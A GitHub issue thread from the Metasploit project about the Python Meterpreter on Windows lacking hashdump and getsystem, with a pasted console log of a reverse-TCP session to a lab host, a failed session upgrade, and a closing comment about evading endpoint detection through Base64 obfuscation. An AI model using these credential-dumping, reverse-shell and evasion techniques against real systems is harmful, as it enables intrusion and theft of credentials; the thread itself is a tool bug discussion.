Feature request: python hashdump #10223

Open
FilterUnfiltered opened this issue Jun 28, 2018 · 13 comments
Labels: feature, meterpreter, suggestion (Suggestions for new functionality), usability (Usability improvements)

Comments

@FilterUnfiltered

Please add the hashdump command to the python meterpreter, thanks!

@wvu
Contributor

wvu commented Jun 28, 2018

For what platform? Linux? Did you try post/linux/gather/hashdump?

@FilterUnfiltered
Author

Windows, and it's not compatible

@wvu
Contributor

wvu commented Jun 28, 2018

Did you try any of the Windows post modules for dumping hashes?

@FilterUnfiltered
Author

Yes, not compatible. I get the following:

meterpreter > run post/windows/gather/hashdump

[!] SESSION may not be compatible with this module.
[*] Obtaining the boot key...
[-] Post failed: NoMethodError undefined method `unpack' for nil:NilClass
[-] Call stack:
[-]   /usr/share/metasploit-framework/modules/post/windows/gather/hashdump.rb:41:in `run'

@wvu
Contributor

wvu commented Jun 28, 2018

That looks like a bug.

@FilterUnfiltered
Author

FilterUnfiltered commented Jun 28, 2018

That happens with basically everything that isn't in the python meterpreter help options... That or similar things, like the module freezing or just crashing the meterpreter shell entirely.

@wvu
Contributor

wvu commented Jun 28, 2018

Yeah, I think it's sufficient to say post modules haven't been tested with every type of Meterpreter.

@wvu
Contributor

wvu commented Jun 28, 2018

Well, maybe try upgrading to a native Meterpreter for the time being. sessions -u or post/multi/manage/shell_to_meterpreter.

@FilterUnfiltered
Author

FilterUnfiltered commented Jun 28, 2018

It's not a shell, it's a python meterpreter. post/multi/manage/shell_to_meterpreter doesn't work and neither does sessions -u... ;(

@wvu
Contributor

wvu commented Jun 28, 2018

I thought we fixed that so Meterpreters could upgrade themselves.

@bcoles
Contributor

bcoles commented Jun 29, 2018

@wvu-r7 we did, but it doesn't support all meterpreters. IIRC, upgrading a lame meterpreter to a real meterpreter has the same issue as sessions -u, largely due to failure to auto-detect the appropriate arch / platform. There are some other bugs with sessions -u, see: #9511

I can confirm that python meterpreter on Windows does not support hashdump and getsystem. Likewise, sessions -u will not upgrade to a native meterpreter.

msf5 exploit(multi/handler) > set payload python/meterpreter/reverse_tcp
payload => python/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 172.16.191.188:1337 
[*] Sending stage (53508 bytes) to 172.16.191.153
[*] Meterpreter session 611 opened (172.16.191.188:1337 -> 172.16.191.153:49372) at 2018-06-29 00:12:30 -0400

^C[-] Exploit failed: Interrupt 
[*] Exploit completed, but no session was created.
msf5 exploit(multi/handler) > 
msf5 exploit(multi/handler) > sessions -i 611
[*] Starting interaction with 611...

meterpreter > getuid
Server username: WIN-SGBSD5TQUTQ\user
meterpreter > getsystem
[-] Unknown command: getsystem.
meterpreter > hashdump
[-] Unknown command: hashdump.
meterpreter > sysinfo
Computer        : WIN-SGBSD5TQUTQ
OS              : Windows 7 (Build 7601, Service Pack 1)
Architecture    : x64
System Language : en_US
Meterpreter     : python/windows
meterpreter > 
Background session 611? [y/N]  

msf5 exploit(multi/handler) > 
msf5 exploit(multi/handler) > sessions -u 611
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [611]

[!] SESSION may not be compatible with this module.
[*] Upgrading session ID: 611
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 172.16.191.188:4433 
[-] Post failed: Rex::Post::Meterpreter::RequestError stdapi_sys_process_execute: Operation failed: Windows error: The system cannot find the file specified.
[-] Call stack:
[-]   /pentest/exploit/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb:163:in `execute'
[-]   /pentest/exploit/metasploit-framework/lib/msf/core/post/common.rb:89:in `cmd_exec'
[-]   /pentest/exploit/metasploit-framework/modules/post/multi/manage/shell_to_meterpreter.rb:164:in `run'
msf5 exploit(multi/handler) > 

Works as expected with a real meterpreter (windows/x64/meterpreter/reverse_tcp).

@wvu
Contributor

wvu commented Jun 29, 2018

:'(

busterb added the feature label Jul 2, 2018
@Neopunkpwn

I've been quite successful evading EPP and EDR detections with Base64 obfuscation on py scripts, but I have the exact same issue as described here, where upgrading to a native meterpreter is not working. Are you guys aware of any progress?

ccondon-r7 added the meterpreter, suggestion (Suggestions for new functionality) and usability (Usability improvements) labels Feb 23, 2020